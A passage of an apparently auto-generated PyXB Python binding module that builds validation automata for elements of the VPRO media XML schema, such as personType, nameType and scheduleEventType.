transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_15, False) ]))
st_17._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_16, True) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_16, False) ]))
st_18._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_17, True) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_17, False) ]))
st_19._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_18, True) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_18, False) ]))
st_20._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_19, True) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_19, False) ]))
st_21._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_20, True) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_20, False) ]))
st_22._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_21, True) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_21, False) ]))
st_23._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_22, True) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_22, False) ]))
st_24._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_23, True) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_23, False) ]))
st_25._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_24, True) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_24, False) ]))
st_26._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_25, True) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_25, False) ]))
st_27._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_26, True) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_26, False) ]))
st_28._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_27, True) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_27, False) ]))
st_29._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_28, True) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_28, False) ]))
st_30._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_29, True) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_29, False) ]))
st_31._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_30, True) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_30, False) ]))
st_32._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_31, True) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_31, False) ]))
st_33._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_32, True) ]))
st_34._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
baseMediaType._Automaton = _BuildAutomaton_13()
personType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'givenName'), pyxb.binding.datatypes.string, scope=personType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 553, 6)))
personType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'familyName'), pyxb.binding.datatypes.string, scope=personType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 554, 6)))
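# Content model encoded by the automaton below (derived from its states and
# transitions): personType requires exactly one givenName element followed by
# exactly one familyName element.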
def _BuildAutomaton_14 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_14
del _BuildAutomaton_14
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(personType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'givenName')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 553, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(personType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'familyName')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 554, 6))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
personType._Automaton = _BuildAutomaton_14()
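# Hedged usage sketch (illustrative only, not emitted by the PyXB generator):
# generated binding modules conventionally expose a module-level
# CreateFromDocument helper, so a document whose root element is declared in
# this schema could be parsed and validated against these automata roughly as
#   instance = CreateFromDocument(xml_bytes)  # 'xml_bytes' is a placeholder
# after which child elements registered via _AddElement are reachable as
# ordinary attributes (e.g. instance.givenName for a personType value).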
nameType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'name'), pyxb.binding.datatypes.string, scope=nameType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 563, 6)))
nameType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'scopeNote'), pyxb.binding.datatypes.string, scope=nameType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 564, 6)))
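# nameType: an optional name element (counter cc_0, 0..1) followed by zero or
# more scopeNote elements (counter cc_1, 0..unbounded); empty content is
# accepted (the automaton below is built as nullable).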
def _BuildAutomaton_15 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_15
del _BuildAutomaton_15
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 563, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 564, 6))
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(nameType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'name')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 563, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(nameType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'scopeNote')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 564, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
nameType._Automaton = _BuildAutomaton_15()
scheduleType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvent'), scheduleEventType, scope=scheduleType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 713, 6)))
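# scheduleType: one or more scheduleEvent elements (the single state below is
# accepting and loops on itself without a counter bound).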
def _BuildAutomaton_16 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_16
del _BuildAutomaton_16
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(scheduleType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvent')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 713, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
scheduleType._Automaton = _BuildAutomaton_16()
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'title'), scheduleEventTitle, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 732, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'description'), scheduleEventDescription, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 733, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'repeat'), repeatType, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 734, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'memberOf'), pyxb.binding.datatypes.anyURI, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 735, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'avAttributes'), avAttributesType, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 736, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'textSubtitles'), pyxb.binding.datatypes.string, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 737, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'textPage'), pyxb.binding.datatypes.string, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 738, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'guideDay'), pyxb.binding.datatypes.date, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 739, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'start'), pyxb.binding.datatypes.dateTime, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 740, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'offset'), pyxb.binding.datatypes.duration, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 741, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'duration'), pyxb.binding.datatypes.duration, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 742, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'poProgID'), pyxb.binding.datatypes.string, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 743, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'primaryLifestyle'), pyxb.binding.datatypes.string, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 744, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'secondaryLifestyle'), pyxb.binding.datatypes.string, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 745, 6)))
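# scheduleEventType, per the counters and transitions below: repeatable
# title and description elements (each 0..unbounded), then optional repeat,
# memberOf, avAttributes, textSubtitles and textPage (each 0..1), then the
# required guideDay and start elements, an optional offset, the required
# duration, and finally optional poProgID, primaryLifestyle and
# secondaryLifestyle, in that order.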
def _BuildAutomaton_17 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_17
del _BuildAutomaton_17
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 732, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 733, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 734, 6))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 735, 6))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 736, 6))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 737, 6))
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 738, 6))
counters.add(cc_6)
cc_7 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 741, 6))
counters.add(cc_7)
cc_8 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 743, 6))
counters.add(cc_8)
cc_9 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 744, 6))
counters.add(cc_9)
cc_10 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 745, 6))
counters.add(cc_10)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'title')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 732, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'description')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 733, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'repeat')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 734, 6))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'memberOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 735, 6))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = None
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'avAttributes')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 736, 6))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = None
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'textSubtitles')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 737, 6))
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = None
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'textPage')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 738, 6))
st_6 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = None
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'guideDay')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 739, 6))
st_7 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
final_update = None
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'start')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 740, 6))
st_8 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_8)
final_update = None
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'offset')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 741, 6))
st_9 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_9)
final_update = set()
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'duration')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 742, 6))
st_10 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_10)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_8, False))
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'poProgID')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 743, 6))
st_11 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
